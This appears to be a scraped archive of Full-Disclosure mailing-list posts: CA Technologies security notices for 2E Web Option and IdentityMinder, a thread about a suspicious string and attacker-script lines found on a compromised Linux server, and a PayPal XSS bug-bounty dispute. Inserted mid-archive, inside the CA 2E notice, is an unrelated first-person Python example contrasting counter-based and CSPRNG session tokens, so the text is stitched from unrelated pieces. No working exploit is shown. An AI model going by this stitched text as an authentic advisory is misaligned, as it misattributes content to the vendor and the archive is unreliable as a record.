[Full-disclosure] CA20140218-01: Security Notice for CA 2E Web Option

2014-02-19 Thread Williams, James K

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

CA20140218-01: Security Notice for CA 2E Web Option

Issued: February 18, 2014

CA Technologies Support is alerting customers to a potential risk in 
CA 2E Web Option (C2WEB).  A vulnerability exists that can allow an 
attacker to exploit an authentication weakness and execute a session 
prediction attack.  The vulnerability, CVE-2014-1219, is due to a 
predictable session token.  An unauthenticated attacker can manipulate 
a session token to gain privileged access to a valid session.  CA 
Technologies has issued fixes to address the vulnerability.

Risk Rating

High

Affected Platforms

IBM i

Affected Products

CA 2E Web Option r8.5
CA 2E Web Option r8.5 + PTF 1
CA 2E Web Option r8.6
CA 2E Web Option r8.6 + PTF B

Note that the vulnerable version reported by Portcullis, r8.1.2, 
reached End of Service (EOS) on April 10, 2013 and is no longer 
supported.  Customers can find the CA 2E r8.1, r8.1 SP1 and r8.1 SP2
End of Service Announcement, dated April 10, 2012, on the CA Support 
website.

Non-Affected Products

None (i.e. all supported versions of CA 2E Web Option are affected)

How to determine if the installation is affected

All supported versions of CA 2E Web Option are affected by this 
vulnerability.

To determine if the fix for this vulnerability has been applied, refer 
to the guidance below for each supported version.

CA 2E Web Option r8.5:
The existence of the data area YHFM55861 in PTF library YW8501254 will 
indicate that this solution has been applied.

CA 2E Web Option r8.6:
The existence of the data area YHFM55865 in PTF library YW860B254 will 
indicate that this solution has been applied.

Solution

CA Technologies has issued the following fixes to address the 
vulnerability.

CA 2E Web Option r8.5:
RO67583

CA 2E Web Option r8.6:
RO67569

Workaround

None

References

CVE-2014-1219 - CA 2E Web Option Session Prediction Vulnerability

CA20140218-01: Security Notice for CA 2E Web Option
https://support.ca.com/irj/portal/anonymous/phpsbpldgpg

Acknowledgement

CVE-2014-1219 - Portcullis

Change History

Version 1.0: Initial Release

If additional information is required, please contact CA Technologies 
Support at https://support.ca.com/.

If you discover a vulnerability in CA Technologies products, please 
report your findings to the CA Technologies Product Vulnerability 
Response Team.
support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782


Thanks and regards,
Ken Williams
CA Technologies
Director, Product Vulnerability Response Team
ken.willi...@ca.com


Copyright © 2014 CA. All Rights Reserved. One CA Plaza, Islandia, N.Y. 
11749. All other trademarks, trade names, service marks, and logos 
referenced herein belong to their respective companies.

-----BEGIN PGP SIGNATURE-----
Version: Encryption Desktop 10.3.2 (Build 15238)
Charset: utf-8

wj8DBQFTA9mXeSWR3+KUGYURAkNJAJ9AuzNLh8ZUGQuwwHVlGvBO9QfQ6ACeO8xG
bFkm420IatsvgNIBBPmUhpg=
=Hgof
-----END PGP SIGNATURE-----
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
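The advisory above attributes CVE-2014-1219 to a predictable session token. The Python below is an added example, not CA's code and not derived from the affected product: it places a deliberately weak, counter-based token issuer (constructed for illustration) beside one built on the operating system's CSPRNG, and adds a coarse sanity check a defender can run over a sample of tokens their own application has issued. The class and function names and the thresholds are my own choices. The check only catches degenerate schemes (sequential, short, or low-entropy tokens); a clean result is not proof of unpredictability, which comes from the generator, not from the test.

```python
import math
import secrets
from collections import Counter
from typing import List, Tuple


class WeakSessionIssuer:
    """Constructed, deliberately weak scheme for illustration only (not CA's code):
    a zero-padded counter, so each new session token is the previous one plus 1."""

    def __init__(self, start: int = 1000) -> None:
        self._next = start

    def issue(self) -> str:
        token = f"{self._next:012d}"
        self._next += 1
        return token


class StrongSessionIssuer:
    """Hardened form: 32 bytes from the OS CSPRNG, URL-safe base64 encoded
    (43 characters carrying 256 bits of entropy)."""

    def issue(self) -> str:
        return secrets.token_urlsafe(32)


def shannon_entropy_bits(tokens: List[str]) -> float:
    """Average Shannon entropy per character over all characters of all tokens."""
    counts = Counter("".join(tokens))
    total = sum(counts.values())
    if total == 0:
        return 0.0
    return -sum(c / total * math.log2(c / total) for c in counts.values())


def sequential_fraction(tokens: List[str]) -> float:
    """Fraction of adjacent token pairs that are consecutive integers.
    Non-numeric tokens cannot be sequential in this sense and score 0."""
    if len(tokens) < 2 or not all(t.isdigit() for t in tokens):
        return 0.0
    values = [int(t) for t in tokens]
    steps = sum(1 for a, b in zip(values, values[1:]) if b - a == 1)
    return steps / (len(values) - 1)


def assess_tokens(tokens: List[str],
                  min_entropy_bits: float = 3.0,
                  max_sequential: float = 0.1,
                  min_length: int = 16) -> Tuple[bool, List[str]]:
    """Coarse predictability check over tokens sampled in issue order.

    Returns (ok, findings). The thresholds are heuristics (chosen here, not
    from any standard) that catch degenerate schemes such as counters or
    timestamps; passing does not prove the generator is unpredictable.
    """
    findings: List[str] = []
    if len(set(tokens)) != len(tokens):
        findings.append("duplicate tokens issued")
    entropy = shannon_entropy_bits(tokens)
    if entropy < min_entropy_bits:
        findings.append(f"low character entropy: {entropy:.2f} bits/char")
    seq = sequential_fraction(tokens)
    if seq > max_sequential:
        findings.append(f"{seq:.0%} of adjacent tokens are consecutive integers")
    if min(len(t) for t in tokens) < min_length:
        findings.append(f"tokens shorter than {min_length} characters")
    return (not findings, findings)


if __name__ == "__main__":
    for name, issuer in (("weak", WeakSessionIssuer()), ("strong", StrongSessionIssuer())):
        sample = [issuer.issue() for _ in range(50)]
        ok, findings = assess_tokens(sample)
        print(name, "ok" if ok else "FAIL", findings)
```

Run against fifty tokens from each issuer, the counter scheme is flagged three ways (consecutive values, entropy near 1.3 bits per character, 12-character length) while the CSPRNG scheme passes. The useful direction is the fix, not the test: replacing the generator with `secrets.token_urlsafe` removes the class of bug the advisory describes, whereas tuning a token scheme until it passes a statistical check does not.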

Re: [Full-disclosure] CVE-2014-1219 - Unauthenticated Privilege Escalation in CA 2E Web Option

2014-02-14 Thread Williams, James K

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

> Date: Wed, 12 Feb 2014 15:59:34 -
> From: "Portcullis Advisories" 
[snip]
> Vulnerability title: Unauthenticated Privilege Escalation in CA 
> 2E Web Option
>
> CVE: CVE-2014-1219
> Vendor: CA
> Product: 2E Web Option
> Affected version: 8.1.2
[snip]   


CA Technologies is currently investigating a vulnerability report 
concerning CA 2E Web Option that was published publicly on 2014-02-11 
(CVE-2014-1219).

This statement can be found at 
http://blogs.ca.com/securityresponse/2014/02/13/

Note that r8.1.2 reached End of Service (EOS) on April 10, 2013 and is 
no longer supported.  Customers can find the End of Service Announcement, 
dated April 10, 2012, on the CA Support website.
https://support.ca.com/

Thanks and regards,
Ken Williams, Director
CA Technologies Product Vulnerability Response Team
CA Technologies Business Unit Operations
ken.willi...@ca.com


Copyright (C) 2014 CA. All Rights Reserved. One CA Plaza, Islandia, N.Y. 
11749. All other trademarks, trade names, service marks, and logos 
referenced herein belong to their respective companies.

-----BEGIN PGP SIGNATURE-----
Version: Encryption Desktop 10.3.1 (Build 13100)
Charset: utf-8

wj8DBQFS/QaPeSWR3+KUGYURApj7AKCX/WOzON/8X9BgbQk4Siz/bDtGBQCeIO8S
VrgYM0oZD2rTLdIN0aje5to=
=AjzU
-----END PGP SIGNATURE-----


Re: [Full-disclosure] Romanian hacker unknown string

2014-01-17 Thread James Condron
It could mean anything. I'm just asking how you got that string. Hell, the
string of numbers '199403' could be there because in the 1994 world cup
Romania got to the 3rd to last game from the World Cup Final. Given enough
random chars in a random file you could probably get lots of allusions to
Romania. Given a string in a passwd file somewhere it could be less likely
to be a coincidence.


On Fri, Jan 17, 2014 at 12:01 PM, Asheesh Tripathi <
informationhacke...@gmail.com> wrote:

> Yes, chances are there. If we search the last 8 characters in a search engine,
> the result will come as "*szrtech1* is a Registered user in the Romanian
> Security Team"; it might be a coincidence.
>
>
> On Fri, Jan 17, 2014 at 5:19 PM, James Condron wrote:
>
>> How are you capturing this password? Chances are it's just a random string
>> they're using.
>>
>>
>> On Fri, Jan 17, 2014 at 11:37 AM, Asheesh Tripathi <
>> informationhacke...@gmail.com> wrote:
>>
>>> Yes, I tried to reset the password of one user account with this string.
>>>
>>>
>>> On Fri, Jan 17, 2014 at 4:57 PM, James Condron <
>>> ja...@zero-internet.org.uk> wrote:
>>>
>>>> Okay, that's fair enough, but where was that string? What makes you think
>>>> it means anything? You said something about it being a password, did you
>>>> not?
>>>>
>>>>
>>>> On Fri, Jan 17, 2014 at 11:21 AM, Asheesh Tripathi <
>>>> informationhacke...@gmail.com> wrote:
>>>>
>>>>> There were many scripts containing a URL to a Romanian hacking
>>>>> forum:
>>>>> printf "for any info vizit http://hacking.3xforum.ro/ \n";
>>>>> printf "daca nu pica in 10 min dai pe alt port \n";
>>>>>
>>>>> I am looking for what this string means:
>>>>> "rt3y(iii#$%)yhyuhub3p3scpb3ll3muuulttreb265199403199403reb265tgzszrtech1"
>>>>>
>>>>>
>>>>>
>>>>>
>>>>> On Fri, Jan 17, 2014 at 4:08 PM, James Condron <
>>>>> ja...@zero-internet.org.uk> wrote:
>>>>>
>>>>>> Where was it? And how do you know 'Romanian hackers' have been near
>>>>>> your server?
>>>>>>
>>>>>> -James
>>>>>>
>>>>>>
>>>>>> On Fri, Jan 17, 2014 at 10:19 AM, Asheesh Tripathi <
>>>>>> informationhacke...@gmail.com> wrote:
>>>>>>
>>>>>>>
>>>>>>> Hi All
>>>>>>>
>>>>>>> During log analysis of a Linux server we have found a string
>>>>>>> passwd
>>>>>>>
>>>>>>> rt3y(iii#$%)yhyuhub3p3scpb3ll3muuulttreb265199403199403reb265tgzszrtech1
>>>>>>>
>>>>>>> Can anybody help me out in understanding the above string? We have
>>>>>>> already found some traces of Romanian hackers.
>>>>>>>
>>>>>>> Thanks
>>>>>>> Anaconda
>>>>>>>
>>>>>>>
>>>>>>
>>>>>>
>>>>>
>>>>
>>>
>>
>

Re: [Full-disclosure] Romanian hacker unknown string

2014-01-17 Thread James Condron
How are you capturing this password? Chances are it's just a random string
they're using.


On Fri, Jan 17, 2014 at 11:37 AM, Asheesh Tripathi <
informationhacke...@gmail.com> wrote:

> Yes, I tried to reset the password of one user account with this string.
>
>
> On Fri, Jan 17, 2014 at 4:57 PM, James Condron wrote:
>
>> Okay, that's fair enough, but where was that string? What makes you think
>> it means anything? You said something about it being a password, did you
>> not?
>>
>>
>> On Fri, Jan 17, 2014 at 11:21 AM, Asheesh Tripathi <
>> informationhacke...@gmail.com> wrote:
>>
>>> There were many scripts containing a URL to a Romanian hacking
>>> forum:
>>> printf "for any info vizit http://hacking.3xforum.ro/ \n";
>>> printf "daca nu pica in 10 min dai pe alt port \n";
>>>
>>> I am looking for what this string means:
>>> "rt3y(iii#$%)yhyuhub3p3scpb3ll3muuulttreb265199403199403reb265tgzszrtech1"
>>>
>>>
>>>
>>>
>>> On Fri, Jan 17, 2014 at 4:08 PM, James Condron <
>>> ja...@zero-internet.org.uk> wrote:
>>>
>>>> Where was it? And how do you know 'Romanian hackers' have been near
>>>> your server?
>>>>
>>>> -James
>>>>
>>>>
>>>> On Fri, Jan 17, 2014 at 10:19 AM, Asheesh Tripathi <
>>>> informationhacke...@gmail.com> wrote:
>>>>
>>>>>
>>>>> Hi All
>>>>>
>>>>> During log analysis of a Linux server we have found a string
>>>>> passwd
>>>>>
>>>>> rt3y(iii#$%)yhyuhub3p3scpb3ll3muuulttreb265199403199403reb265tgzszrtech1
>>>>>
>>>>> Can anybody help me out in understanding the above string? We have
>>>>> already found some traces of Romanian hackers.
>>>>>
>>>>> Thanks
>>>>> Anaconda
>>>>>
>>>>>
>>>>
>>>>
>>>
>>
>

Re: [Full-disclosure] Romanian hacker unknown string

2014-01-17 Thread James Condron
Okay, that's fair enough, but where was that string? What makes you think it
means anything? You said something about it being a password, did you not?


On Fri, Jan 17, 2014 at 11:21 AM, Asheesh Tripathi <
informationhacke...@gmail.com> wrote:

> There were many scripts containing a URL to a Romanian hacking
> forum:
> printf "for any info vizit http://hacking.3xforum.ro/ \n";
> printf "daca nu pica in 10 min dai pe alt port \n";
>
> I am looking for what this string means:
> "rt3y(iii#$%)yhyuhub3p3scpb3ll3muuulttreb265199403199403reb265tgzszrtech1"
>
>
>
>
> On Fri, Jan 17, 2014 at 4:08 PM, James Condron wrote:
>
>> Where was it? And how do you know 'Romanian hackers' have been near your
>> server?
>>
>> -James
>>
>>
>> On Fri, Jan 17, 2014 at 10:19 AM, Asheesh Tripathi <
>> informationhacke...@gmail.com> wrote:
>>
>>>
>>> Hi All
>>>
>>> During log analysis of a Linux server we have found a string
>>> passwd
>>> rt3y(iii#$%)yhyuhub3p3scpb3ll3muuulttreb265199403199403reb265tgzszrtech1
>>>
>>> Can anybody help me out in understanding the above string? We have already
>>> found some traces of Romanian hackers.
>>>
>>> Thanks
>>> Anaconda
>>>
>>>
>>
>>
>

Re: [Full-disclosure] Romanian hacker unknown string

2014-01-17 Thread James Condron
Where was it? And how do you know 'Romanian hackers' have been near your
server?

-James


On Fri, Jan 17, 2014 at 10:19 AM, Asheesh Tripathi <
informationhacke...@gmail.com> wrote:

>
> Hi All
>
> During log analysis of a Linux server we have found a string
> passwd
> rt3y(iii#$%)yhyuhub3p3scpb3ll3muuulttreb265199403199403reb265tgzszrtech1
>
> Can anybody help me out in understanding the above string? We have already
> found some traces of Romanian hackers.
>
> Thanks
> Anaconda
>
>

Re: [Full-disclosure] PayPal.com XSS Vulnerability

2013-05-29 Thread James Condron
Hrm,

I read it that the issue was still the age but that the previous disclosure was 
another reason they had found. It's sneaky and poor but I didn't read it as a 
change in reason; just an additional thing they found. It may even be true.

The fact is they handled this poorly but whether they're lying about another 
person finding it or not had they been cleverly dishonest they would have gone 
with that in the first place.

They really ought to pay, though.

On 29 May 2013, at 14:51, Jeffrey Walton  wrote:

> Hi James,
> 
>> I guess the email from ebay sorta makes it all moot anyway.
> It's interesting how the reason code changed. On May 24 the reason was
> Kugler was too young; and then on May 29 the reason was the flaw was
> previously reported.
> 
> It sounds like PayPal is lying to bring this to an end; and they've
> lost more credibility.
> 
> Jeff
> 
> On Wed, May 29, 2013 at 9:22 AM, James Condron
>  wrote:
>> Ah, but then don't forget that in a contract (which this most certainly is 
>> not- but the parallels are there) ambiguity benefits the party which didn't 
>> draft the document.
>> 
>> If it's reasonable to infer a payment, and reasonable to fail to infer an age 
>> range, I think it's reasonable to get paid for it.
>> 
>> I guess the email from ebay sorta makes it all moot anyway.
>> 
>> On 29 May 2013, at 13:33, Julius Kivimäki  wrote:
>> 
>>> Well, they don't exactly state that they're going to pay you either.
>>> 
>>> 
>>> 2013/5/29 Źmicier Januszkiewicz 
>>> 
>>>> Hmm, interesting.
>>>> 
>>>> For some reason I fail to find the mentioned "age requirements" at the
>>>> official bug bounty page located at
>>>> https://www.paypal.com/us/webapps/mpp/security/reporting-security-issues
>>>> Am I looking in the wrong direction? Can someone please point to where
>>>> this is written?
>>>> 
>>>> With kind regards,
>>>> Z.
>>>> 
>>>> 
>>>> 2013/5/29 Robert Kugler 
>>>> 
>>>>> 
>>>>> 
>>>>> 
>>>>> 2013/5/29 Jeffrey Walton 
>>>>> 
>>>>>> On Fri, May 24, 2013 at 12:38 PM, Robert Kugler
>>>>>>  wrote:
>>>>>>> Hello all!
>>>>>>> 
>>>>>>> I'm Robert Kugler, a 17-year-old German student who's interested in
>>>>>>> securing computer systems.
>>>>>>> 
>>>>>>> I would like to warn you that PayPal.com is vulnerable to a Cross-Site
>>>>>>> Scripting vulnerability!
>>>>>>> PayPal Inc. is running a bug bounty program for professional security
>>>>>>> researchers.
>>>>>>> 
>>>>>>> ...
>>>>>>> Unfortunately PayPal disqualified me from receiving any bounty payment
>>>>>>> because of being 17 years old...
>>>>>>> 
>>>>>>> ...
>>>>>>> I don’t want to accuse PayPal of a kind of bug bounty cost saving, but
>>>>>>> it’s not the best idea when you're interested in motivated security
>>>>>>> researchers...
>>>>>> Fortunately Microsoft and Firefox took a more reasonable position for
>>>>>> the bugs you discovered with their products.
>>>>>> 
>>>>>> PCWorld and MSN picked up the story:
>>>>>> 
>>>>>> http://www.pcworld.com/article/2039940/paypal-denies-teenager-reward-for-finding-website-bug.html
>>>>>> and
>>>>>> http://now.msn.com/paypal-denies-reward-to-robert-kugler-teen-who-found-bug-in-code
>>>>>> .
>>>>>> It is now newsworthy to Wikipedia, where it will live forever under
>>>>>> Criticisms (unfortunately, it appears PayPal does a lot of
>>>>>> questionable things so it's just one of a long list).
>>>>>> 
>>>>>> Jeff
>>>>>> 
>>>>> 
>>>>> Today I received an email from PayPal Site Security:
>>>>> 
>>>>> "Hi Robert,
>>>>> 
>>>>> We appreciate your research efforts and we are sorry that our
>>>>> age requirements restrict you from participating in our Bug Bounty 
>>>>> Program.
>>>>> With regards to your specific bug su

Re: [Full-disclosure] PayPal.com XSS Vulnerability

2013-05-29 Thread James Condron
Ah, but then don't forget that in a contract (which this most certainly is not- 
but the parallels are there) ambiguity benefits the party which didn't draft 
the document.

If it's reasonable to infer a payment, and reasonable to fail to infer an age 
range, I think it's reasonable to get paid for it.

I guess the email from ebay sorta makes it all moot anyway.

On 29 May 2013, at 13:33, Julius Kivimäki  wrote:

> Well, they don't exactly state that they're going to pay you either.
> 
> 
> 2013/5/29 Źmicier Januszkiewicz 
> 
>> Hmm, interesting.
>> 
>> For some reason I fail to find the mentioned "age requirements" at the
>> official bug bounty page located at
>> https://www.paypal.com/us/webapps/mpp/security/reporting-security-issues
>> Am I looking in the wrong direction? Can someone please point to where
>> this is written?
>> 
>> With kind regards,
>> Z.
>> 
>> 
>> 2013/5/29 Robert Kugler 
>> 
>>> 
>>> 
>>> 
>>> 2013/5/29 Jeffrey Walton 
>>> 
>>>> On Fri, May 24, 2013 at 12:38 PM, Robert Kugler
>>>>  wrote:
>>>>> Hello all!
>>>>> 
>>>>> I'm Robert Kugler, a 17-year-old German student who's interested in
>>>>> securing computer systems.
>>>>> 
>>>>> I would like to warn you that PayPal.com is vulnerable to a Cross-Site
>>>>> Scripting vulnerability!
>>>>> PayPal Inc. is running a bug bounty program for professional security
>>>>> researchers.
>>>>> 
>>>>> ...
>>>>> Unfortunately PayPal disqualified me from receiving any bounty payment
>>>>> because of being 17 years old...
>>>>> 
>>>>> ...
>>>>> I don’t want to accuse PayPal of a kind of bug bounty cost saving, but
>>>>> it’s not the best idea when you're interested in motivated security
>>>>> researchers...
>>>> Fortunately Microsoft and Firefox took a more reasonable position for
>>>> the bugs you discovered with their products.
>>>> 
>>>> PCWorld and MSN picked up the story:
>>>> 
>>>> http://www.pcworld.com/article/2039940/paypal-denies-teenager-reward-for-finding-website-bug.html
>>>> and
>>>> http://now.msn.com/paypal-denies-reward-to-robert-kugler-teen-who-found-bug-in-code
>>>> .
>>>> It is now newsworthy to Wikipedia, where it will live forever under
>>>> Criticisms (unfortunately, it appears PayPal does a lot of
>>>> questionable things so it's just one of a long list).
>>>> 
>>>> Jeff
>>>> 
>>> 
>>> Today I received an email from PayPal Site Security:
>>> 
>>> "Hi Robert,
>>> 
>>> We appreciate your research efforts and we are sorry that our
>>> age requirements restrict you from participating in our Bug Bounty Program.
>>> With regards to your specific bug submission, we should have also mentioned
>>> that the vulnerability you submitted was previously reported by another
>>> researcher and we are already actively fixing the issue. We hope that you
>>> understand that bugs that have previously been reported to us are not
>>> eligible for payment as we must honor the original researcher that provided
>>> the vulnerability.
>>> 
>>> I would also mention that in general, PayPal has been a consistent
>>> supporter of what is known as “responsible disclosure”.  That is, ensuring
>>> that a company has a reasonable amount of time to fix a bug from
>>> notification to public disclosure.  This allows the company to fix the bug,
>>> so that criminals cannot use that knowledge to exploit it, but still gives
>>> the researchers the ability to draw attention to their skills and
>>> experience.  When researchers go down the “full disclosure” path, it then
>>> puts us in a race with criminals who may successfully use the vulnerability
>>> you found to victimize our customers.  We do not support the full
>>> disclosure methodology, precisely because it puts real people at
>>> unnecessary risk. We hope you keep that in mind when doing future research.
>>> 
>>> We acknowledge that PayPal can do more to recognize younger security
>>> researchers around the world. As a first step, we would like you to be the
>>> first security researcher in the history of our program to receive an
>>> official "Letter of Recognition" from our Chief Information Security
>>> Officer Michael Barrett (attached, will follow up with a signed copy
>>> tomorrow). We truly appreciate your contribution to helping keep PayPal
>>> secure for our customers and we will continue to explore other ways that we
>>> can provide alternate recognition for younger researchers.
>>> 
>>> We'd welcome the chance to explain this all to you first hand over the
>>> phone, please email us at this address with a number and good time to reach
>>> you and we’d be happy to follow up.
>>> 
>>> Thank you,
>>> PayPal Site Security"
>>> 
>>> It's still curious that they only mentioned the first researcher who
>>> previously found the bug after all the media attention... Nevertheless, I
>>> appreciate their intention to also acknowledge younger security
>>> researchers; it's a step in the right direction!!
>>> 
>>> Best regards,
>>> 
>>> Robert Kugler
>>> 

[Full-disclosure] CA20121220-01: Security Notice for CA IdentityMinder [updated]

2013-01-18 Thread Williams, James K


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

CA20121220-01: Security Notice for CA IdentityMinder

Issued: December 20, 2012
Updated: January 18, 2013


CA Technologies Support is alerting customers to two potential risks in CA 
IdentityMinder (formerly known as CA Identity Manager).  Two 
vulnerabilities exist that can allow a remote attacker to execute 
arbitrary commands, manipulate data, or gain elevated access.  CA 
Technologies has issued patches to address the vulnerabilities.

The first vulnerability, CVE-2012-6298, allows a remote attacker to execute
arbitrary commands or manipulate data.

The second vulnerability, CVE-2012-6299, allows a remote attacker to gain 
elevated access.


Risk Rating

High


Affected Platforms

All


Affected Products

CA IdentityMinder r12.0 CR16 and earlier
CA IdentityMinder r12.5 SP1 thru SP14
CA IdentityMinder r12.6 GA


Non-Affected Products

None (i.e. all supported versions of CA IdentityMinder are vulnerable)


How to determine if the installation is affected

All versions of CA IdentityMinder r12.0, r12.5 prior to SP15, and r12.6 GA 
are vulnerable.

You can confirm that patches have been successfully applied by checking the
dates associated with the following IdentityMinder jar files (the jar files
are created in the patch output sub-folder structure in the root folder 
from which you have run the patch utility):

CA IdentityMinder r12.0 CR16 and earlier – user_console.jar
CA IdentityMinder r12.5 SP1 thru SP6 – user_console.jar
CA IdentityMinder r12.5 SP7 thru SP14 – user_console.jar & imsapi6.jar
CA IdentityMinder r12.6 GA –  user_console.jar & imsapi6.jar

The dates on these jar files will be set to the date on which the patch was
applied.


Solution

CA Technologies has issued the following patches to address the 
vulnerabilities.  Download the appropriate patch(es) and follow the 
instructions in the readme.txt file.  These patches can be applied to all 
operating system platforms.

12.0CR8+ - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/120CR8+.zip

12.5SP1 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP1.zip

12.5SP2 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP2.zip

12.5SP3 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP3.zip

12.5SP4 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP4.zip

12.5SP5 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP5.zip

12.5SP6 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP6.zip

12.5SP7 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP7.zip

12.5SP8 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP8.zip

12.5SP9 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP9.zip

12.5SP10 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP10.zip

12.5SP11 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP11.zip

12.5SP12 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP12.zip

12.5SP13 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP13.zip

12.5SP14 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP14.zip

12.6SP0 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/126GA.zip


Workaround

None


References

CVE-2012-6298 - CA IdentityMinder execute arbitrary commands or manipulate
data
CVE-2012-6299 - CA IdentityMinder gain elevated access

CA20121220-01: Security Notice for CA IdentityMinder
(URL may wrap)
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={FBA53B61-3A68-4506-9876-F845F6DD8A93}


Acknowledgement

CVE-2012-6298 - Discovered internally by CA Technologies 
CVE-2012-6299 - Discovered internally by CA Technologies


Change History

Version 1.0: Initial Release

Version 1.1: Revised the section entitled "How to determine if the 
installation is affected".


If additional information is required, please contact CA Technologies 
Support at https://support.ca.com/

If you discover a vulnerability in CA Technologies products, please report 
your findings to the CA Technologies Product Vulnerability Response Team.
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782

CA Technologies Security Notices
https://support.ca.com/irj/portal/anonymous/phpsbpldgpg


Thanks and regards,
Ken Williams, Director
CA Technologies Product Vulnerability Response Team
CA Technologies Business Unit Operations
wilj...@ca.com


Copyright (C) 2013 CA. All Rights Reserved. One CA Plaza, Islandia, N.Y. 
11749. All other trademarks, trade names, service marks, and logos 
referenced herein belong to their respective companies.

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.9.1 (Build 287)
Charset: utf-8

wj8DBQFQ+dCzeSWR3+KUGYURAnGbAJ9yscNDhny2rCY2X4qS6g/YtOtM6QCffyTw
tZL1z2lAQhkrxdDNzN9tyzs=
=rNug
-----END PGP SIGNATURE-----


[Full-disclosure] CA20121220-01: Security Notice for CA IdentityMinder

2012-12-20 Thread Williams, James K

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

CA20121220-01: Security Notice for CA IdentityMinder

Issued: December 20, 2012


CA Technologies Support is alerting customers to two potential risks in CA 
IdentityMinder (formerly known as CA Identity Manager).  Two 
vulnerabilities exist that can allow a remote attacker to execute arbitrary
commands, manipulate data, or gain elevated access.  CA Technologies has 
issued patches to address the vulnerability.

The first vulnerability, CVE-2012-6298, allows a remote attacker to execute
arbitrary commands or manipulate data.

The second vulnerability, CVE-2012-6299, allows a remote attacker to gain 
elevated access.


Risk Rating

High


Affected Platforms

All


Affected Products

CA IdentityMinder r12.0 CR16 and earlier
CA IdentityMinder r12.5 SP1 thru SP14
CA IdentityMinder r12.6 GA


Non-Affected Products

None (i.e. all supported versions of CA IdentityMinder are vulnerable)


How to determine if the installation is affected

All versions of CA IdentityMinder r12.0, r12.5 prior to SP15, and r12.6 GA 
are vulnerable.

You can confirm that patches have been successfully applied by checking the
dates associated with the following IdentityMinder jar files: imsapi6.jar 
and ims.jar.  The dates on these jars will be set to the dates on which the
patch was applied.


Solution

CA Technologies has issued the following patches to address the 
vulnerabilities.  Download the appropriate patch(es) and follow the 
instructions in the readme.txt file.  These patches can be applied to all 
operating system platforms.

12.0CR8+ - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/120CR8+.zip

12.5SP1 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP1.zip

12.5SP2 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP2.zip

12.5SP3 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP3.zip

12.5SP4 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP4.zip

12.5SP5 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP5.zip

12.5SP6 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP6.zip

12.5SP7 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP7.zip

12.5SP8 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP8.zip

12.5SP9 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP9.zip

12.5SP10 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP10.zip

12.5SP11 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP11.zip

12.5SP12 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP12.zip

12.5SP13 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP13.zip

12.5SP14 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP14.zip

12.6SP0 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/126GA.zip



Workaround

None


References

CVE-2012-6298 - CA IdentityMinder execute arbitrary commands or manipulate
data
CVE-2012-6299 - CA IdentityMinder gain elevated access

CA20121220-01: Security Notice for CA IdentityMinder
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={FBA53B61-3A68-4506-9876-F845F6DD8A93}


Acknowledgement

CVE-2012-6298 - Discovered internally by CA Technologies 
CVE-2012-6299 - Discovered internally by CA Technologies


Change History

Version 1.0: Initial Release


If additional information is required, please contact CA Technologies 
Support at https://support.ca.com/

If you discover a vulnerability in CA Technologies products, please report 
your findings to the CA Technologies Product Vulnerability Response Team.
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782


Thanks and regards,
Ken Williams, Director
CA Technologies Product Vulnerability Response Team
CA Technologies Business Unit Operations
wilj...@ca.com


Copyright (C) 2012 CA. All Rights Reserved. One CA Plaza, Islandia, N.Y. 
11749. All other trademarks, trade names, service marks, and logos 
referenced herein belong to their respective companies.


-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.9.1 (Build 287)
Charset: utf-8

wj8DBQFQ04dQeSWR3+KUGYURAoIZAJ9QibJh7LUweVUQzvBstoWWeDV5eQCfSG1A
YK0Og3SiMtIHOoA6JWE1vTA=
